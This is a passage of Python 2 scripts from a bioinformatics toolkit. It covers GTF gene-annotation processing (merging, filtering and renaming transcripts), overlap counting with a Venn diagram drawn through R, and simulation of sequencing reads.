"[%default]")
parser.add_option("--use-gene-id", dest="use_geneid", action="store_true",
help="when merging transcripts, exons or introns, use "
"the parent gene_id as the transcript id.")
parser.add_option("-m", "--method", dest="method", type="choice",
action="append",
choices=(
"add-protein-id",
"exons2introns",
"filter",
"find-retained-introns",
"genes-to-unique-chunks",
"intersect-transcripts",
"join-exons",
"merge-exons",
"merge-transcripts",
"merge-genes",
"merge-introns",
"remove-overlapping",
"remove-duplicates",
"rename-genes",
"rename-transcripts",
"rename-duplicates",
"renumber-genes",
"renumber-transcripts",
"set-transcript-to-gene",
"set-gene-to-transcript",
"set-protein-to-transcript",
"set-score-to-distance",
"set-gene_biotype-to-source",
"set-source-to-transcript_biotype",
"sort",
"transcript2genes",
"unset-genes"),
help="Method to apply [%default]."
"Please only select one.")
parser.set_defaults(
sort_order="gene",
filter_method="gene",
pattern="%i",
merge_exons_distance=0,
filename_filter=None,
intron_border=None,
intron_min_length=None,
sample_size=0,
min_exons_length=0,
ignore_strand=False,
mark_utr=False,
with_utr=True,
invert_filter=False,
duplicate_feature=None,
strict=True,
method=None,
use_geneid=False,
)
(options, args) = E.Start(parser, argv=argv)
ninput, noutput, nfeatures, ndiscarded = 0, 0, 0, 0
if options.method is None:
raise ValueError("please specify a --method")
if len(options.method) > 1:
raise ValueError("multiple --method arguements specified")
else:
options.method = options.method[0]
if options.method == "set-transcript-to-gene":
for gff in GTF.iterator(options.stdin):
ninput += 1
gff.setAttribute("transcript_id", gff.gene_id)
options.stdout.write("%s\n" % str(gff))
noutput += 1
nfeatures += 1
elif options.method == "set-gene_biotype-to-source":
for gff in GTF.iterator(options.stdin):
ninput += 1
if "gene_biotype" not in gff.attributes:
gff.setAttribute("gene_biotype", gff.source)
options.stdout.write("%s\n" % str(gff))
noutput += 1
nfeatures += 1
elif options.method == "set-source-to-transcript_biotype":
for gff in GTF.iterator(options.stdin):
ninput += 1
try:
gff.source = gff.transcript_biotype
except AttributeError:
pass
options.stdout.write("%s\n" % str(gff))
noutput += 1
nfeatures += 1
elif options.method == "remove-duplicates":
counts = collections.defaultdict(int)
if options.duplicate_feature == "ucsc":
store = []
remove = set()
f = lambda x: x[0].transcript_id
gffs = GTF.transcript_iterator(
GTF.iterator(options.stdin), strict=False)
outf = lambda x: "\n".join([str(y) for y in x])
for entry in gffs:
ninput += 1
store.append(entry)
id = f(entry)
if "_dup" in id:
remove.add(re.sub("_dup\d+", "", id))
remove.add(id)
for entry in store:
id = f(entry)
if id not in remove:
options.stdout.write(outf(entry) + "\n")
noutput += 1
else:
ndiscarded += 1
E.info("discarded duplicates for %s" % (id))
else:
if options.duplicate_feature == "gene":
gffs = GTF.gene_iterator(
GTF.iterator(options.stdin), strict=False)
f = lambda x: x[0][0].gene_id
outf = lambda x: "\n".join(
["\n".join([str(y) for y in xx]) for xx in x])
elif options.duplicate_feature == "transcript":
gffs = GTF.transcript_iterator(
GTF.iterator(options.stdin), strict=False)
f = lambda x: x[0].transcript_id
outf = lambda x: "\n".join([str(y) for y in x])
elif options.duplicate_feature == "coordinates":
gffs = GTF.chunk_iterator(GTF.iterator(options.stdin))
f = lambda x: x[0].contig + "_" + \
str(x[0].start) + "-" + str(x[0].end)
outf = lambda x: "\n".join([str(y) for y in x])
store = []
for entry in gffs:
ninput += 1
store.append(entry)
id = f(entry)
counts[id] += 1
# Assumes GTF file sorted by contig then start
last_id = ""
if options.duplicate_feature == "coordinates":
for entry in store:
id = f(entry)
if id == last_id:
ndiscarded += 1
E.info("discarded duplicates for %s: %i" %
(id, counts[id]))
else:
options.stdout.write(outf(entry) + "\n")
noutput += 1
last_id = id
else:
for entry in store:
id = f(entry)
if counts[id] == 1:
options.stdout.write(outf(entry) + "\n")
noutput += 1
else:
ndiscarded += 1
E.info("discarded duplicates for %s: %i" %
(id, counts[id]))
elif "sort" == options.method:
for gff in GTF.iterator_sorted(GTF.iterator(options.stdin),
sort_order=options.sort_order):
ninput += 1
options.stdout.write("%s\n" % str(gff))
noutput += 1
nfeatures += 1
elif "set-gene-to-transcript" == options.method:
for gff in GTF.iterator(options.stdin):
ninput += 1
gff.setAttribute("gene_id", gff.transcript_id)
options.stdout.write("%s\n" % str(gff))
noutput += 1
nfeatures += 1
elif "set-protein-to-transcript" == options.method:
for gff in GTF.iterator(options.stdin):
ninput += 1
gff.setAttribute("protein_id", gff.transcript_id)
options.stdout.write("%s\n" % str(gff))
noutput += 1
nfeatures += 1
elif "add-protein-id" == options.method:
transcript2protein = IOTools.readMap(
IOTools.openFile(options.filename_filter, "r"))
missing = set()
for gff in GTF.iterator(options.stdin):
ninput += 1
if gff.transcript_id not in transcript2protein:
if gff.transcript_id not in missing:
E.debug(
("removing transcript '%s' due to "
"missing protein id") % gff.transcript_id)
missing.add(gff.transcript_id)
ndiscarded += 1
continue
gff.setAttribute(
"protein_id", transcript2protein[gff.transcript_id])
options.stdout.write("%s\n" % str(gff))
noutput += 1
nfeatures += 1
E.info("transcripts removed due to missing protein ids: %i" %
len(missing))
elif "join-exons" == options.method:
for exons in GTF.transcript_iterator(GTF.iterator(options.stdin)):
ninput += 1
strand = Genomics.convertStrand(exons[0].strand)
contig = exons[0].contig
transid = exons[0].transcript_id
geneid = exons[0].gene_id
biotype = exons[0].source
all_start, all_end = min([x.start for x in exons]), max(
[x.end for x in exons])
y = GTF.Entry()
y.contig = contig
y.source = biotype
y.feature = "transcript"
y.start = all_start
y.end = all_end
y.strand = strand
y.transcript_id = transid
y.gene_id = geneid
options.stdout.write("%s\n" % str(y))
elif "merge-genes" == options.method:
# merges overlapping genes
#
gffs = GTF.iterator_sorted_chunks(
GTF.flat_gene_iterator(GTF.iterator(options.stdin)),
sort_by="contig-strand-start")
def iterate_chunks(gff_chunks):
last = gff_chunks.next()
to_join = [last]
for gffs in gff_chunks:
d = gffs[0].start - last[-1].end
if gffs[0].contig == last[0].contig and \
gffs[0].strand == last[0].strand:
assert gffs[0].start >= last[0].start, \
("input file should be sorted by contig, strand "
"and position: d=%i:\nlast=\n%s\nthis=\n%s\n") % \
(d,
"\n".join([str(x) for x in last]),
"\n".join([str(x) for x in gffs]))
if gffs[0].contig != last[0].contig or \
gffs[0].strand != last[0].strand or \
d > 0:
yield to_join
to_join = []
last = gffs
to_join.append(gffs)
yield to_join
raise StopIteration
for chunks in iterate_chunks(gffs):
ninput += 1
if len(chunks) > 1:
gene_id = "merged_%s" % chunks[0][0].gene_id
transcript_id = "merged_%s" % chunks[0][0].transcript_id
info = ",".join([x[0].gene_id for x in chunks])
else:
gene_id = chunks[0][0].gene_id
transcript_id = chunks[0][0].transcript_id
info = None
intervals = []
for c in chunks:
intervals += [(x.start, x.end) for x in c]
intervals = Intervals.combine(intervals)
# take single strand
strand = chunks[0][0].strand
for start, end in intervals:
y = GTF.Entry()
y.fromGTF(chunks[0][0], gene_id, transcript_id)
y.start = start
y.end = end
y.strand = strand
if info:
y.addAttribute("merged", info)
options.stdout.write("%s\n" % str(y))
nfeatures += 1
noutput += 1
elif options.method == "renumber-genes":
map_old2new = {}
for gtf in GTF.iterator(options.stdin):
ninput += 1
if gtf.gene_id not in map_old2new:
map_old2new[gtf.gene_id] = options.pattern % (
len(map_old2new) + 1)
gtf.setAttribute("gene_id", map_old2new[gtf.gene_id])
options.stdout.write("%s\n" % str(gtf))
noutput += 1
elif options.method == "unset-genes":
map_old2new = {}
for gtf in GTF.iterator(options.stdin):
ninput += 1
key = gtf.transcript_id
if key not in map_old2new:
map_old2new[key] = options.pattern % (len(map_old2new) + 1)
gtf.setAttribute("gene_id", map_old2new[key])
options.stdout.write("%s\n" % str(gtf))
noutput += 1
elif options.method == "renumber-transcripts":
map_old2new = {}
for gtf in GTF.iterator(options.stdin):
ninput += 1
key = (gtf.gene_id, gtf.transcript_id)
if key not in map_old2new:
map_old2new[key] = options.pattern % (
len(map_old2new) + 1)
gtf.setAttribute("transcript_id", map_old2new[key])
options.stdout.write("%s\n" % str(gtf))
noutput += 1
elif options.method == "transcripts2genes":
transcripts = set()
genes = set()
ignore_strand = options.ignore_strand
for gtfs in GTF.iterator_transcripts2genes(
GTF.iterator(options.stdin)):
ninput += 1
for gtf in gtfs:
if ignore_strand:
gtf.strand = "."
options.stdout.write("%s\n" % str(gtf))
transcripts.add(gtf.transcript_id)
genes.add(gtf.gene_id)
nfeatures += 1
noutput += 1
E.info("transcripts2genes: transcripts=%i, genes=%i" %
(len(transcripts), len(genes)))
elif options.method in ("rename-genes", "rename-transcripts"):
map_old2new = IOTools.readMap(
IOTools.openFile(options.filename_filter, "r"))
if options.method == "rename-transcripts":
is_gene_id = False
elif options.method == "rename-genes":
is_gene_id = True
for gff in GTF.iterator(options.stdin):
ninput += 1
if is_gene_id:
if gff.gene_id in map_old2new:
gff.setAttribute("gene_id", map_old2new[gff.gene_id])
else:
E.debug("removing missing gene_id %s" % gff.gene_id)
ndiscarded += 1
continue
else:
if gff.transcript_id in map_old2new:
gff.setAttribute(
"transcript_id", map_old2new[gff.transcript_id])
else:
E.debug("removing missing transcript_id %s" %
gff.transcript_id)
ndiscarded += 1
continue
noutput += 1
options.stdout.write("%s\n" % str(gff))
elif options.method == "filter":
keep_genes = set()
if options.filter_method == "longest-gene":
iterator = GTF.flat_gene_iterator(GTF.iterator(options.stdin))
coords = []
gffs = []
for gff in iterator:
gff.sort(key=lambda x: x.start)
coords.append((gff[0].contig,
min([x.start for x in gff]),
max([x.end for x in gff]),
gff[0].gene_id))
gffs.append(gff)
coords.sort()
last_contig = None
max_end = 0
longest_gene_id = None
longest_length = None
for contig, start, end, gene_id in coords:
ninput += 1
if contig != last_contig or start >= max_end:
if longest_gene_id:
keep_genes.add(longest_gene_id)
longest_gene_id = gene_id
longest_length = end - start
max_end = end
else:
if end - start > longest_length:
longest_length, longest_gene_id = end - start, gene_id
last_contig = contig
max_end = max(max_end, end)
keep_genes.add(longest_gene_id)
invert = options.invert_filter
for gff in gffs:
keep = gff[0].gene_id in keep_genes
if (keep and not invert) or (not keep and invert):
noutput += 1
for g in gff:
nfeatures += 1
options.stdout.write("%s\n" % g)
else:
ndiscarded += 1
elif options.filter_method in ("longest-transcript",
"representative-transcript"):
iterator = GTF.gene_iterator(GTF.iterator(options.stdin))
def selectLongestTranscript(gene):
r = []
for transcript in gene:
transcript.sort(key=lambda x: x.start)
length = transcript[-1].end - transcript[0].start
r.append((length, transcript))
r.sort()
return r[-1][1]
def selectRepresentativeTranscript(gene):
'''select a representative transcript.
The representative transcript represent the largest number
of exons over all transcripts.
'''
all_exons = []
for transcript in gene:
all_exons.extend([(x.start, x.end)
for x in transcript
if x.feature == "exon"])
exon_counts = {}
for key, exons in itertools.groupby(all_exons):
exon_counts[key] = len(list(exons))
transcript_counts = []
for transcript in gene:
count = sum([exon_counts[(x.start, x.end)]
for x in transcript if x.feature == "exon"])
# add transcript id to sort to provide a stable
# segmentation.
transcript_counts.append((count,
transcript[0].transcript_id,
transcript))
transcript_counts.sort()
return transcript_counts[-1][-1]
if options.filter_method == "longest-transcript":
_select = selectLongestTranscript
elif options.filter_method == "representative-transcript":
_select = selectRepresentativeTranscript
for gene in iterator:
ninput += 1
# sort in order to make reproducible which
# gene is chosen.
transcript = _select(sorted(gene))
noutput += 1
for g in transcript:
nfeatures += 1
options.stdout.write("%s\n" % g)
elif options.filter_method in ("gene", "transcript"):
if options.filename_filter:
ids = IOTools.readList(
IOTools.openFile(options.filename_filter, "r"))
E.info("read %i ids" % len(ids))
ids = set(ids)
by_gene = options.filter_method == "gene"
by_transcript = options.filter_method == "transcript"
invert = options.invert_filter
ignore_strand = options.ignore_strand
for gff in GTF.iterator(options.stdin):
ninput += 1
keep = False
if by_gene:
keep = gff.gene_id in ids
if by_transcript:
keep = gff.transcript_id in ids
if (invert and keep) or (not invert and not keep):
continue
if ignore_strand:
gff.strand = "."
options.stdout.write("%s\n" % str(gff))
nfeatures += 1
noutput += 1
elif options.sample_size:
if options.filter_method == "gene":
iterator = GTF.flat_gene_iterator(
GTF.iterator(options.stdin))
elif options.filter_method == "transcript":
iterator = GTF.transcript_iterator(
GTF.iterator(options.stdin))
if options.min_exons_length:
iterator = GTF.iterator_min_feature_length(
iterator,
min_length=options.min_exons_length,
feature="exon")
data = [x for x in iterator]
ninput = len(data)
if len(data) > options.sample_size:
data = random.sample(data, options.sample_size)
for d in data:
noutput += 1
for dd in d:
nfeatures += 1
options.stdout.write(str(dd) + "\n")
else:
assert False, "please supply either a filename "
"with ids to filter with (--map-tsv-file) or a sample-size."
elif options.filter_method in ("proteincoding", "lincrna",
"processed-pseudogene"):
# extract entries by transcript/gene biotype.
# This filter uses a test on the source field (ENSEMBL pre v78)
# a regular expression on the attributes (ENSEMBL >= v78).
tag = {"proteincoding": "protein_coding",
"processed-pseudogene": "processed_pseudogene",
"lincrna": "lincRNA"}[options.filter_method]
rx = re.compile('"%s"' % tag)
if not options.invert_filter:
f = lambda x: x.source == tag or rx.search(x.attributes)
else:
f = lambda x: x.source != tag and not rx.search(x.attributes)
for gff in GTF.iterator(options.stdin):
ninput += 1
if f(gff):
options.stdout.write(str(gff) + "\n")
noutput += 1
else:
ndiscarded += 1
elif options.method == "exons2introns":
for gffs in GTF.flat_gene_iterator(GTF.iterator(options.stdin)):
ninput += 1
cds_ranges = GTF.asRanges(gffs, "CDS")
exon_ranges = GTF.asRanges(gffs, "exon")
input_ranges = Intervals.combine(cds_ranges + exon_ranges)
if len(input_ranges) > 1:
last = input_ranges[0][1]
output_ranges = []
for start, end in input_ranges[1:]:
output_ranges.append((last, start))
last = end
if options.intron_border:
b = options.intron_border
output_ranges = [(x[0] + b, x[1] - b)
for x in output_ranges]
if options.intron_min_length:
l = options.intron_min_length
output_ranges = [
x for x in output_ranges if x[1] - x[0] > l]
for start, end in output_ranges:
entry = GTF.Entry()
entry.copy(gffs[0])
entry.clearAttributes()
entry.transcript_id = "merged"
entry.feature = "intron"
entry.start = start
entry.end = end
options.stdout.write("%s\n" % str(entry))
nfeatures += 1
noutput += 1
else:
ndiscarded += 1
elif options.method == "set-score-to-distance":
for gffs in GTF.transcript_iterator(GTF.iterator(options.stdin)):
ninput += 1
strand = Genomics.convertStrand(gffs[0].strand)
all_start, all_end = min([x.start for x in gffs]), max(
[x.end for x in gffs])
if strand != ".":
t = 0
if strand == "-":
gffs.reverse()
for gff in gffs:
gff.score = t
t += gff.end - gff.start
if strand == "-":
gffs.reverse()
for gff in gffs:
options.stdout.write("%s\n" % str(gff))
nfeatures += 1
noutput += 1
elif options.method == "remove-overlapping":
index = GTF.readAndIndex(
GTF.iterator(IOTools.openFile(options.filename_gff, "r")))
for gffs in GTF.transcript_iterator(GTF.iterator(options.stdin)):
ninput += 1
found = False
for e in gffs:
if index.contains(e.contig, e.start, e.end):
found = True
break
if found:
ndiscarded += 1
else:
noutput += 1
for e in gffs:
nfeatures += 1
options.stdout.write("%s\n" % str(e))
elif options.method == "intersect-transcripts":
for gffs in GTF.gene_iterator(GTF.iterator(options.stdin),
strict=options.strict):
ninput += 1
r = []
for g in gffs:
if options.with_utr:
ranges = GTF.asRanges(g, "exon")
else:
ranges = GTF.asRanges(g, "CDS")
r.append(ranges)
result = r[0]
for x in r[1:]:
result = Intervals.intersect(result, x)
entry = GTF.Entry()
entry.copy(gffs[0][0])
entry.clearAttributes()
entry.transcript_id = "merged"
entry.feature = "exon"
for start, end in result:
entry.start = start
entry.end = end
options.stdout.write("%s\n" % str(entry))
nfeatures += 1
noutput += 1
elif "rename-duplicates" == options.method:
# note: this will only rename entries with "CDS" in feature column
assert options.duplicate_feature in ["gene", "transcript", "both"],\
("for renaming duplicates, --duplicate-feature must be set to one "
"of 'gene', transcript' or 'both'")
gene_ids = list()
transcript_ids = list()
gtfs = list()
for gtf in GTF.iterator(options.stdin):
gtfs.append(gtf)
if gtf.feature == "CDS":
gene_ids.append(gtf.gene_id)
transcript_ids.append(gtf.transcript_id)
dup_gene = [item for item in set(gene_ids) if gene_ids.count(item) > 1]
dup_transcript = [item for item in set(transcript_ids)
if transcript_ids.count(item) > 1]
E.info("Number of duplicated gene_ids: %i" % len(dup_gene))
E.info("Number of duplicated transcript_ids: %i" % len(dup_transcript))
gene_dict = dict(zip(dup_gene, ([0] * len(dup_gene))))
transcript_dict = dict(zip(dup_transcript,
([0] * len(dup_transcript))))
for gtf in gtfs:
if gtf.feature == "CDS":
if options.duplicate_feature in ["both", "gene"]:
if gtf.gene_id in dup_gene:
gene_dict[gtf.gene_id] = gene_dict[gtf.gene_id] + 1
# TS. patch until pysam.ctabixproxies.pyx bugfixed
gtf.attributes = gtf.attributes.strip()
gtf.setAttribute('gene_id',
gtf.gene_id + "." +
str(gene_dict[gtf.gene_id]))
if options.duplicate_feature in ["both", "transcript"]:
if gtf.transcript_id in dup_transcript:
transcript_dict[gtf.transcript_id] = \
transcript_dict[gtf.transcript_id] + 1
# TS. patch until pysam.ctabixproxies.pyx bugfixed
gtf.attributes = gtf.attributes.strip()
gtf.setAttribute(
'transcript_id',
gtf.transcript_id + "." +
str(transcript_dict[gtf.transcript_id]))
options.stdout.write("%s\n" % gtf)
elif options.method in ("merge-exons",
"merge-introns",
"merge-transcripts"):
for gffs in GTF.flat_gene_iterator(
GTF.iterator(options.stdin),
strict=options.strict):
ninput += 1
cds_ranges = GTF.asRanges(gffs, "CDS")
exon_ranges = GTF.asRanges(gffs, "exon")
# sanity checks
strands = set([x.strand for x in gffs])
contigs = set([x.contig for x in gffs])
if len(strands) > 1:
raise ValueError(
"can not merge gene '%s' on multiple strands: %s" % (
gffs[0].gene_id, str(strands)))
if len(contigs) > 1:
raise ValueError(
"can not merge gene '%s' on multiple contigs: %s" % (
gffs[0].gene_id, str(contigs)))
strand = Genomics.convertStrand(gffs[0].strand)
utr_ranges = []
if cds_ranges and options.mark_utr:
cds_start, cds_end = cds_ranges[0][0], cds_ranges[-1][1]
midpoint = (cds_end - cds_start) / 2 + cds_start
utr_ranges = []
for start, end in Intervals.truncate(exon_ranges, cds_ranges):
if end - start > 3:
if strand == ".":
feature = "UTR"
elif strand == "+":
if start < midpoint:
feature = "UTR5"
else:
feature = "UTR3"
elif strand == "-":
if start < midpoint:
feature = "UTR3"
else:
feature = "UTR5"
utr_ranges.append((feature, start, end))
try:
biotypes = [x["gene_biotype"] for x in gffs]
biotype = ":".join(set(biotypes))
except (KeyError, AttributeError):
biotype = None
def output_ranges(ranges, gffs, biotype=None,
use_geneid=False):
result = []
for feature, start, end in ranges:
entry = GTF.Entry()
entry.copy(gffs[0])
entry.clearAttributes()
entry.feature = feature
if use_geneid:
entry.transcript_id = entry.gene_id
else:
entry.transcript_id = "merged"
if biotype:
entry.addAttribute("gene_biotype", biotype)
entry.start = start
entry.end = end
result.append(entry)
return result
result = []
if options.method == "merge-exons":
if options.with_utr:
if options.mark_utr:
result.extend(output_ranges(utr_ranges, gffs, biotype,
options.use_geneid))
r = [("CDS", x, y) for x, y in
Intervals.combineAtDistance(
cds_ranges, options.merge_exons_distance)]
else:
r = [("exon", x, y) for x, y in
Intervals.combineAtDistance(
exon_ranges, options.merge_exons_distance)]
else:
r = [("CDS", x, y) for x, y in
Intervals.combineAtDistance(
cds_ranges, options.merge_exons_distance)]
elif options.method == "merge-transcripts":
if options.with_utr:
r = [("exon", exon_ranges[0][0],
exon_ranges[-1][1])]
elif cds_ranges:
r = [("exon", cds_ranges[0][0],
cds_ranges[-1][1])]
else:
ndiscarded += 1
continue
elif options.method == "merge-introns":
if len(exon_ranges) >= 2:
r = [("exon",
exon_ranges[0][1],
exon_ranges[-1][0])]
else:
ndiscarded += 1
continue
result.extend(output_ranges(r, gffs, biotype, options.use_geneid))
result.sort(key=lambda x: x.start)
for x in result:
options.stdout.write("%s\n" % str(x))
nfeatures += 1
noutput += 1
elif options.method == "find-retained-introns":
for gene in GTF.gene_iterator(GTF.iterator(options.stdin)):
ninput += 1
found_any = False
for intron in find_retained_introns(gene):
found_any = True
options.stdout.write("%s\n" % str(intron))
nfeatures += 1
if found_any:
noutput += 1
elif options.method == "genes-to-unique-chunks":
for gene in GTF.flat_gene_iterator(GTF.iterator(options.stdin)):
ninput += 1
for exon in gene_to_blocks(gene):
options.stdout.write("%s\n" % str(exon))
nfeatures += 1
noutput += 1
else:
raise ValueError("unknown method '%s'" % options.method)
E.info("ninput=%i, noutput=%i, nfeatures=%i, ndiscarded=%i" %
(ninput, noutput, nfeatures, ndiscarded))
E.Stop()
if __name__ == "__main__":
sys.exit(main(sys.argv))
```
#### File: cgat/scripts/gtf2overlap.py
```python
import os
import sys
import random
import CGAT.Experiment as E
import CGAT.GTF as GTF
import CGAT.IOTools as IOTools
from rpy2.robjects import r as R
from rpy2.robjects.vectors import FloatVector
def main(argv=None):
"""script main.
parses command line options in sys.argv, unless *argv* is given.
"""
if not argv:
argv = sys.argv
# setup command line parser
parser = E.OptionParser(version="%prog version: $Id: cgat_script_template.py 2871 2010-03-03 10:20:44Z andreas $",
usage=globals()["__doc__"])
parser.add_option("-a", "--first-gtf-file", dest="gtf_a", type="string",
help="supply a gtf file - will compress uncompressed files")
parser.add_option("-b", "--second-gtf-file", dest="gtf_b", type="string",
help="supply a second gtf file - will compress uncompressed files")
parser.add_option("-s", "--scripts-dir", dest="scripts_dir", type="string",
help="supply a location for accessory scripts")
parser.add_option("--no-venn", dest="no_venn", action="store_true",
help="set if no venn is to be drawn")
# add common options (-h/--help, ...) and parse command line
(options, args) = E.Start(parser, argv=argv)
gtf_files = [options.gtf_a, options.gtf_b]
merged_files = []
prefices = []
E.info("merging gtf files")
for gtf in gtf_files:
if gtf.endswith(".gtf.gz"):
outfile = IOTools.snip(gtf, ".gtf.gz") + ".merged.gtf.gz"
prefices.append(IOTools.snip(gtf, ".gtf.gz"))
merged_files.append(outfile)
statement = '''zcat %s | python %s/gtf2gtf.py --method=merge-transcripts --log=%s.log | gzip > %s''' % (
gtf, options.scripts_dir, outfile, outfile)
P.execute(statement)
elif gtf.endswith(".gtf"):
outfile = IOTools.snip(gtf, ".gtf") + ".merged.gtf.gz"
prefices.append(IOTools.snip(gtf, ".gtf"))
merged_files.append(outfile)
statement = '''cat %s | python %s/gtf2gtf.py --method=merge-transcripts --log=%s.log | gzip > %s''' % (
gtf, options.scripts_dir, outfile, outfile)
E.execute(statement)
else:
raise ValueError(
"cannot perform merge on %s: is not a gtf file" % gtf)
for prefix in prefices:
if options.gtf_a.find(prefix) != -1:
gtf_a = prefix + ".merged.gtf.gz"
prefix_a = prefix
elif options.gtf_b.find(prefix) != -1:
gtf_b = prefix + ".merged.gtf.gz"
prefix_b = prefix
E.info("intersecting gtf files")
# intersect the resulting merged files
scriptsdir = options.scripts_dir
intersection_out = "_vs_".join(
[prefix_a, prefix_b]) + ".intersection.gtf.gz"
statement = '''intersectBed -a %(gtf_a)s -b %(gtf_b)s -s -wa
| python %(scriptsdir)s/gtf2gtf.py --method=merge-transcripts --log=log | gzip > %(intersection_out)s'''
P.run()
if not options.no_venn:
E.info("producing venn diagram for %s vs %s..." %
(options.gtf_a, options.gtf_b))
# produce the venn diagram
intersection_file = intersection_out
gtf_a_merged = gtf_a
gtf_b_merged = gtf_b
# create dictionary key
gtf_pair = (gtf_a_merged, gtf_b_merged)
# containers for counts
count_gtf_merged_a = 0
count_gtf_merged_b = 0
count_intersection = 0
# create GTF iterator objects
gtf_iterator_a = GTF.iterator(IOTools.openFile(gtf_pair[0]))
gtf_iterator_b = GTF.iterator(IOTools.openFile(gtf_pair[1]))
gtf_iterator_intersection = GTF.iterator(
IOTools.openFile(intersection_file))
# do the counts for each file
E.info("counting entries in %s" % gtf_a)
for entry in gtf_iterator_a:
count_gtf_merged_a += 1
print "counts for gtf-a: ", count_gtf_merged_a
E.info("counting entries in %s" % gtf_b)
for entry in gtf_iterator_b:
count_gtf_merged_b += 1
print "counts for gtf-b: ", count_gtf_merged_b
E.info("counting entries in %s" % intersection_file)
for entry in gtf_iterator_intersection:
count_intersection += 1
print "counts for intersection: ", count_intersection
# this is the important bit - basically take an arbitrary list of numbers to represent the list of lincrna in the refnoncoding set
# then use the intersection count to represent the overlapping section in the lincrna set and add a set of random numbers to this
# set to make up the remaining - non-overlapping set
result = {}
E.info("assembling count lists")
result[gtf_pair] = {"gtf-b": map(str, xrange(count_gtf_merged_b)), "gtf-a": map(str, xrange(count_intersection)) +
map(str, [random.random() for i in range(count_intersection, count_gtf_merged_a)])}
R_source = os.path.join(
os.path.abspath(options.scripts_dir), "venn_diagram.R")
R.source(R_source)
prefix_a = prefix_a.replace(".", "_").replace("-", "_")
prefix_b = prefix_b.replace(".", "_").replace("-", "_")
R('''prefix.a <- "%s"''' % prefix_a)
R('''prefix.b <- "%s"''' % prefix_b)
E.info("drawing venn diagram to %s" %
(prefix_a + "_vs_" + prefix_b + ".overlap.png"))
R["venn.diagram2"](R.list(A=result[gtf_pair]["gtf-a"], B=result[gtf_pair]["gtf-b"]), prefix_a + "_vs_" + prefix_b + ".overlap.png", **{'cat.cex': 1.5, 'main.fontfamily': "Arial", 'cat.pos': FloatVector((0, 0)), 'cat.fontfamily': "Arial", 'main.cex': 1.8, 'height': 1000, 'width': 1000, 'cex': 2, 'fontfamily': "Arial", 'lwd': R.c(1, 1), 'fill': R.c(R.rgb(0, 0, 0.5, 0.5), R.rgb(0.5, 0, 0, 0.5)), 'category.names': R.c(prefix_a, prefix_b), 'margin': R.c(0.1, 0.1, 0.1, 0.1)
})
# write footer and output benchmark information.
E.Stop()
if __name__ == "__main__":
sys.exit(main(sys.argv))
```
#### File: cgat/scripts/gtf2reads.py
```python
import sys
import random
import CGAT.GTF as GTF
import CGAT.Experiment as E
import CGAT.IndexedFasta as IndexedFasta
import CGAT.Genomics as Genomics
import CGAT.SequencePairProperties as SequencePairProperties
import CGAT.Iterators as Iterators
import numpy
import numpy.random
def getMutatedSequence(sequence, divergence):
"""sample number of events from a Poisson distribution.
This is a very hacky, simple mutator that does not take into account
multiple substitutions per site and/or a substitution matrix.
Only use for small divergences.
"""
lsequence = len(sequence)
nmutate = numpy.random.poisson(float(lsequence) * divergence)
sequence = list(sequence.upper())
for pos in random.sample(xrange(lsequence), nmutate):
c = sequence[pos]
x = c
while x == c:
x = random.choice("ACGT")
sequence[pos] = x
return "".join(sequence)
# ------------------------------------------------------------
def main(argv=None):
if argv is None:
argv = sys.argv
parser = E.OptionParser(
version="%prog version: $Id$",
usage=globals()["__doc__"])
parser.add_option("-g", "--genome-file", dest="genome_file", type="string",
help="filename with genome [default=%default].")
parser.add_option("-p", "--output-filename-pattern", dest="output_filename_pattern", type="string",
help="OUTPUT filename with histogram information on aggregate coverages [%default].")
parser.add_option("--read-length-mean", dest="read_length_mean", type="float",
help="simulation parameter [default=%default].")
parser.add_option("--read-length-std", dest="read_length_stddev", type="float",
help="simulation parameter [default=%default].")
parser.add_option("--coverage-mean", dest="coverage_mean", type="float",
help="simulation parameter [default=%default].")
parser.add_option("--coverage-std", dest="coverage_stddev", type="float",
help="simulation parameter [default=%default].")
parser.add_option("--ds-mean", dest="ds_mean", type="float",
help="simulation parameter [default=%default].")
parser.add_option("--ds-std", dest="ds_stddev", type="float",
help="simulation parameter [default=%default].")
parser.add_option("--error-mean", dest="error_mean", type="float",
help="simulation parameter [default=%default].")
parser.add_option("--error-std", dest="error_stddev", type="float",
help="simulation parameter [default=%default].")
parser.add_option("--min-read-length", dest="min_read_length", type="int",
help="minimum read length [default=%default].")
parser.add_option("--sample-size", dest="sample_size", type="int",
help="randomly sample from selected transcripts [default=%default].")
parser.add_option("--test", dest="test", type="int",
help="test with # first entries [default=%default].")
parser.add_option("--mode", dest="mode", type="choice",
choices=("genes", "transcripts"),
help="use genes or transcripts [default=%default].")
parser.set_defaults(
genome_file=None,
read_length_mean=200.0,
read_length_stddev=20.0,
coverage_mean=2.0,
coverage_stddev=1.0,
ds_mean=None,
ds_stddev=None,
error_mean=None,
error_stddev=None,
min_read_length=50,
test=None,
mode="transcripts",
output_filename_pattern=None,
output_format_id="%010i",
sample_size=0,
)
(options, args) = E.Start(parser, argv)
assert options.genome_file, "please supply an indexed genome."
if options.output_filename_pattern:
outfile_stats = open(options.output_filename_pattern % "stats", "w")
outfile_stats.write(
"id\tlen\tnreads\tlen_mean\tlen_std\tcov_mean\tcov_std\n")
outfile_map = open(options.output_filename_pattern % "map", "w")
outfile_map.write("id\ttranscript\n")
else:
outfile_stats = None
outfile_map = None
genome = IndexedFasta.IndexedFasta(options.genome_file)
ninput, noutput, nskipped = 0, 0, 0
total_counts, total_read_lengths, total_len = [], [], 0
total_pids = []
total_error_pids = []
if options.mode == "transcripts":
iterator = GTF.transcript_iterator(
GTF.iterator_filtered(GTF.iterator(options.stdin), feature="exon"))
getId = lambda x: x.transcript_id
elif options.mode == "genes":
iterator = GTF.flat_gene_iterator(
GTF.iterator_filtered(GTF.iterator(options.stdin), feature="exon"))
getId = lambda x: x.gene_id
if options.sample_size:
iterator = Iterators.sample(iterator)
if options.ds_mean:
do_mutate = True
pid_calc = SequencePairProperties.SequencePairPropertiesPID()
else:
do_mutate = False
if options.error_mean:
do_error = True
pid_calc = SequencePairProperties.SequencePairPropertiesPID()
else:
do_error = False
for gtfs in iterator:
id = getId(gtfs[0])
try:
sequence = GTF.toSequence(gtfs, genome)
except KeyError, msg:
if options.loglevel >= 2:
options.stdlog.write("# skipping %s: %s\n" % (id, msg))
nskipped += 1
continue
lsequence = len(sequence)
if lsequence <= options.min_read_length * 2:
if options.loglevel >= 2:
options.stdlog.write(
"# skipping %s - sequence is too short: %i\n" % (id, lsequence))
nskipped += 1
continue
ninput += 1
if do_mutate:
new_sequence = getMutatedSequence(sequence, options.ds_mean)
pid_calc.loadPair(sequence, new_sequence)
pid = pid_calc.mPID
